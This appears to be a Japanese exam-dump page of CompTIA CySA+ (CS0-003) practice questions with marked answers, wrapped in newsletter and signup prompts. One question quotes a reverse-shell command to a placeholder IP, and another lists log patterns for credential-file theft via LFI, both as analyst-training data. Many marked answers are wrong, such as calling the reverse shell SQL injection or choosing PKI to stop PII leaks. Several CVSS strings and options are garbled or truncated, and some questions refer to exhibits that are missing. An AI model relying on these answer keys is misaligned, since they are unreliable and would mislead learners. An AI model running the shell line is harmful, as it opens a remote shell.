すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

CompTIA CS0-003認定試験問題集, CompTIA Cybersecurity Analyst (CySA+)|SPOTO

弊社の総合模擬試験問題集を利用してCompTIA CS0-003認定試験に備えることができます。弊社のプラットフォームは無料試験、サンプル問題、模擬試験など様々な試験資料を提供しております。この分野の専門家たちが作成した試験問題集を利用し、試験の準備を強化しましょう。弊社のオンライン試験シミュレーターを利用して、実際の試験シナリオをシミュレートし、あなたの準備態勢を測定します。当社の試験用ダンプを使用すると、試験の構成と内容に関する貴重な洞察を得ることができ、試験当日に自信を持つことができます。CompTIA Cybersecurity Analyst (CySA+)認定試験に合格するために、弊社の模擬試験で知識を強化することができます。
他のオンライン試験を受ける

質問 #1
次のうち、データ切断の問題によって最も影響を受ける組織のイニシアチブはどれですか?
A. クラウドベース環境への移行
B. ローカルホスト型仮想サーバーへの移行
C. 否認防止策の導入
D. ローカルデータベースクエリの暗号化
回答を見る
正解: C
質問 #2
あるセキュリティアナリストが最近チームに加わり、本番用スクリプトで使用されているスクリプト言語を特定し、それが悪意のあるスクリプトかどうかを判断しようとしている。次のスクリプトがあるとします:このスクリプトで使用されているスクリプト言語は次のどれですか?
A. パワーシェル
B. ルビー
C. パイソン
D. シェルスクリプト
回答を見る
正解: A
質問 #3
あるセキュリティアナリストが、基盤となるホストから認証情報を引き出すために悪用できる LFI 脆弱性を発見した。セキュリティアナリストがウェブサーバのログを検索して、その特定の脆弱性の悪用の証拠を探すために使用できるパターンはどれか。
A. /etc/ shadow
B. curl ローカルホスト
C. ; printenv
D. cat /proc/self/
回答を見る
正解: A
質問 #4
特定のサーバーのパッチ情報を収集する最も良い方法はどれか。
A. イベントビューア
B. カスタムスクリプト
C. SCAPソフトウェア
D. CI/CD
回答を見る
正解: D
質問 #5
最高情報セキュリティ責任者は、ゼロトラスト・アプローチの一環として、攻撃表面のリスクと脅威を低減するための新しいプログラムを指示している。ITセキュリティチームは、このプログラムの優先順位を考えることが求められている。一般的な攻撃のフレームワークに基づく優先順位として、最も適切なものはどれか。
A. 管理者と特権アクセスアカウントの削減
B. ネットワークベースのIDSの採用
C. 徹底したインシデント対応の実施
D. エンタープライズアプリケーションへのSSOを有効にする
回答を見る
正解: C
質問 #6
ある組織には、次のようなリスク軽減方針がある:確率が95%以上のリスクは、影響度に関係なく、他のすべてのリスクよりも優先して対処する。それ以外の優先順位付けは、リスク価値に基づいて行われる。組織は以下のリスクを特定した:次のうち、リスク軽減の優先順位が高いものから低いものはどれか。
A. A, B, D, C
B. A, B, C, D
C. D, A, B, C
D. D, A, C, B
回答を見る
正解: C
質問 #7
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H この脆弱性を正しく説明している属性はどれか。
A. この脆弱性を悪用するにはユーザが必要です。
B. 脆弱性はネットワークベースである。
C. 脆弱性は機密性には影響しない。
D. 脆弱性を悪用するための複雑さは高い。
回答を見る
正解: B
質問 #8
ウェブサーバのログを調べていたセキュリティアナリストが、以下の行を発見した:次の悪意のある行為のどれが試みられましたか?
A. コマンド・インジェクション
B. XMLインジェクション
C. サーバーサイド・リクエスト・フォージェリ
D. クロスサイトスクリプティング
回答を見る
正解: D
質問 #9
あるアナリストがWebサーバーのログを調べているとき、同じタイムスタンプを持つ複数のエントリが、リクエスト行にすべて奇妙な文字が含まれていることに気づきました。次に取るべき手順はどれか。
A. 直ちにネットワークをシャットダウンし、指揮系統の次の者に連絡する。
B. 奇妙な文字がどのような攻撃を示しているかを判断する。
C. 正しい攻撃の枠組みを利用し、インシデント対応の内容を決定する。
D. インシデント対応のため、地元の法執行機関に通知する。
回答を見る
正解: D
質問 #10
災害復旧計画を策定する際に、最初に行うべきステップはどれか。
A. 計画の目標と目的に合意する
B. 災害時に使用するサイトを決定するC
C. 災害時に実行されるアイデンティティ・アプリケーション
回答を見る
正解: A
質問 #11
SIEM、SOAR、および発券システムに対する最近の投資を考慮した場合、組織が注目すべき最適な指標はどれか。
A. 平均検出時間
B. 戦術別エクスプロイト数
C. アラート音量
D. 侵入試行回数
回答を見る
正解: A
質問 #12
従業員がウェブサイトにアクセスし、デバイスが侵入型マルウェアに感染した。インシデント対応アナリストは最初の証拠ログを作成する。デバイスのワイヤレスアダプターを無効にした。アクセスしたWebサイトを特定できなかった従業員にインタビューした。 Webプロキシのトラフィックログを確認した。感染したデバイスを修復するために、アナリストが行うべきことは次のうちどれですか?
A. システムのファームウェアを更新し、ハードウェアを再イメージする。
B. アナリストに電子メールアラートを送信する追加のマルウェアスキャナをインストールする。
C. インターネットアクセスにプロキシサーバーを使用するようにシステムを設定する。
D. ユーザープロファイルを削除し、バックアップからデータを復元する。
回答を見る
正解: A
質問 #13
ある製造会社は、ティア1のセキュリティ・サポートにサードパーティーのサービス・プロバイダーを利用している。要件の1つは、地政学的および国家安全保障上の利害関係から、プロバイダは自国からのみ人材を調達しなければならないというものです。サードパーティのサービスプロバイダがこの要件を満たすようにするために、製造会社が実施できることは次のうちどれでしょうか。
A. ガバナンスを備えた安全なサプライチェーンプログラムを導入する。
B. 県外からのIPアドレスに対してブラックリストを導入する。
C. 請負業者に対して強力な認証管理を導入する。
D. 主要なスタッフに対してユーザー行動分析を実施する。
回答を見る
正解: A
質問 #14
あるITセキュリティアナリストが、会社が最近購入した新車両の脆弱性に関する電子メールアラートを受信しました。この脆弱性は、次の攻撃ベクトルのうち、どれを標的にしている可能性が最も高いですか?
A. SCADA
B. CANバス
C. モドバス
D. ロット
回答を見る
正解: A
質問 #15
SIEMアラートに含まれるIPアドレスが既知の悪意のあるIPアドレスであるかどうかを、アナリストが迅速に見つけるのに役立つのはどれか。
A. 自社の業界に特化した情報共有・分析センターに加入する。
B. 脅威インテリジェンスを STIX/TAXII 形式で IPS にアップロードする。
C. C
D. SIEM アラートを表示した後、脅威フィードを確認します。
回答を見る
正解: A
質問 #16
あるセキュリティアナリストが、同じ会社や地域に属する異なる送信元ネットワークから送信される可能性のあるネットワークアドレスを特定しようとしています。この目的を達成するために役立つシェルスクリプト関数は、次のうちどれですか。
A. function w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y( { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup$1) && echo "$1 | $c" }
回答を見る
正解: A
質問 #17
最近のゼロデイ脆弱性が積極的に悪用されており、ユーザーによる操作や権限の昇格を必要とせず、機密性と完全性に重大な影響を与えますが、可用性には影響を与えません。このゼロデイ脅威に対して最も正確なCVEメトリクスはどれか。
A. CVSS: 31/AV: N/AC: L/PR:N/UI:N/S: U/C: H/1: K/A: L
B. CVSS:31/AV:K/AC:L/ PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
回答を見る
正解: A
質問 #18
前夜のインシデント・レポートを確認したセキュリティ・アナリストは、企業のウェブサイトがポ・マカイのプロパガンダで改ざんされていることに気づきました。このタイプの行為者を最もよく表しているのはどれか。
A. ハクティビスト
B. 国民国家
C. 内部脅威
D. 組織犯罪
回答を見る
正解: C
質問 #19
あるアナリストが、ヘッダーに追加文字を含む HTTPS トラフィックを別の国の既知の悪意のある IP に送信している内部デバイスがあることに気付きました。アナリストが気づいたことを説明するものは次のうちどれですか。
A. ビーコン
B. クロスサイト・スクリプティング
C. バッファオーバーフロー
D. PHP トラバーサル
回答を見る
正解: D
質問 #20
あるセキュリティアナリストが、次のコマンドを含む悪用の試みを検出した: sh -i >& /dev/udp/10.1.1.1/4821 0>$l 試みようとしているのはどれか?
A. RCE
B. 逆シェル
C. XSS
D. SQLインジェクション
回答を見る
正解: D
質問 #21
あるセキュリティアナリストが、会社の幹部になりすました電子メールを防ぐために、会社の電子メールシステムのセキュリティを向上させる方法を研究しています。この目的を達成するために、アナリストが設定する最もよいものはどれか。
A. ネームサーバー上のSPF用TXTレコード
B. レプリケーションを保護するDNSSEC鍵
C. ドメインキーの特定
D. 着信マッドをチェックするサンドボックス
回答を見る
正解: B
質問 #22
あるセキュリティ・アナリストが、企業ネットワークから3層のクラウド環境へのセキュアな接続性を開発学習者に提供する必要がある。開発者は、さまざまな設定タスクを実行するために、3階層すべてのサーバーにアクセスする必要がある。安全なトランスポートを提供するために、アナリストが実装すべき技術はどれか。
A. CASB
B. VPC
C. 連盟
D. VPN
回答を見る
正解: C
質問 #23
成功する情報セキュリティプログラムの重要な要素について、最も適切なものはどれか。
A. ビジネスインパクト分析、資産・変更管理、セキュリティコミュニケーション計画
B. セキュリティポリシーの実施、役割と責任の割り当て、情報資産の分類
C. C
D. 上級管理職の組織構造、メッセージの伝達基準、セキュリティ管理システムの運用手順
回答を見る
正解: A
質問 #24
あるセキュリティアナリストが、ネットワークルーティングの異常を特定しようとしている。この目的を最も正確に達成するために、アナリストがシェルスクリプトで使用できる関数は次のうちどれですか。
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
C. function x( { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
回答を見る
正解: D
質問 #25
ある組織が最近、BCプランとDRプランを変更した。インシデントレスポンスチームが、ビジネスに影響を与えることなく、変更をテストするのに最適なものはどれか。
A. 事前に確認した事故シナリオに基づき、卓上訓練を実施する。
B. プライマリデータセンターの電源をシャットダウンして、インシデントをシミュレートする。
C. アクティブなワークロードをプライマリデータセンターからセカンダリに移行する。
D. 現在の計画と過去の事故から学んだ教訓を比較する。
回答を見る
正解: B
質問 #26
ある組織の有力な営業担当者であるジョーは、現職を辞め、現在の勤務先と競合する新会社を立ち上げるとソーシャルメディアで発表した。ジョーは現在の雇用主の顧客を勧誘している。しかし、ジョーはまだ退職しておらず、現在の上司にも相談していません。インシデント対応チームが推奨する最善の行動はどれか。
A. ジョーのPCをネットワークから切り離す
B. 標準的な操作手順に基づいて PC を再イメージする
C. モバイルデバイス管理を使って、ジョーのPCをリモートワイプする。
D. 人事部または法律顧問が次のステップについて助言するまで、何もしない。
回答を見る
正解: B
質問 #27
組織外へのPIIの流出を防ぐために最も有効なツールはどれか?
A. PAM
B. IDS
C. PKI
D. DLP
回答を見る
正解: C
質問 #28
最高情報セキュリティ責任者は、企業内のシャドーITを排除し、削減したいと考えている。リスクの高いクラウドアプリケーションがいくつか使用されており、それが組織のリスクを高めています。リスク低減に役立つソリューションはどれか。
A. CASBを導入し、ポリシーの適用を有効にする。
B. 厳格なアクセスでMFAを設定する
C. APIゲートウェイを導入する
D. クラウドアプリケーションへのSSOを有効にする
回答を見る
正解: A
質問 #29
ある企業の最高情報責任者は、CASBソリューションを使用して、クラウド・アクセス時にポリシーが遵守されていることを確認したいと考えている。会社のビジネスの性質とリスク許容度から、経営陣は財務情報をクラウドに保存しないことを選択した。セキュリティアナリストは、クラウドへの財務データ漏えいの脅威を軽減するソリューションを推奨する必要があります。アナリストが推奨すべきはどれか。
A. CASB を活用して、構内に保管されている金融情報の DLP データアットレスト保護を実施する。
B. この目的のためにCASBソリューションを利用せず、移動中のデータ用に構内DLPを追加する。
C. CASBを活用して、クラウドに移動する金融情報のDLPデータインモーション保護を実施する。
D. この目的のためにCASBソリューションを利用せず、静止データ用に構内DLPを追加する。
回答を見る
正解: C
質問 #30
あるセキュリティアナリストが、パケットキャプチャのアクティビティのタイプを分析するために、tcpdumpの出力をレビューしています:上記の出力を生成したのはどれか?
A. ポートスキャン
B. TLS接続
C. 脆弱性スキャン
D. ピン・スイープ
回答を見る
正解: D
質問 #31
あるセキュリティアナリストが、パケットキャプチャを解析したところ、次のような不審なDNSトラフィックを発見した。トンネリングセッションがアクティブな間のDNSトラフィック。?クエリー間の平均時間が1秒未満である。?平均クエリ長が100文字を超える。次のうち、最も可能性の高い攻撃はどれですか?
A. DNSの流出
B. DNSスプーフィング
C. DNSゾーン転送
D. DNSポイズニング
回答を見る
正解: D
質問 #32
サイバーセキュリティのアナリストが、会社が取引していない国から異常なネットワークスキャンアクティビティが来ていることに気づきました。次のうち、最適な緩和手法はどれですか?
A. 問題の発信国をジオブロックする
B. ネットワークファイアウォールでスキャンのIP範囲をブロックする。
C. 過去の傾向分析を行い、同様のスキャン活動を探す。
D. ネットワークファイアウォールでスキャンの特定のIPアドレスをブロックする。
回答を見る
正解: A
質問 #33
仮説を立て、侵害の指標を探し、発見されたことを利用して検知能力を積極的に向上させることは、その価値の一例である:
A. 脆弱性スキャン。
B. 脅威狩り。
C. レッド・ラーニング
D. ペネトレーションテスト
回答を見る
正解: B
質問 #34
新任のサイバーセキュリティアナリストが、組織に対する可能性のある脅威について、幹部向けのブリーフィングを作成する仕事を任された。ブリーフィングに必要なデータを作成するのは、次のうちどれでしょうか。
A. ファイアウォールのログ
B. 妥協の指標
C. リスク評価
D. アクセス制御リスト
回答を見る
正解: B

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: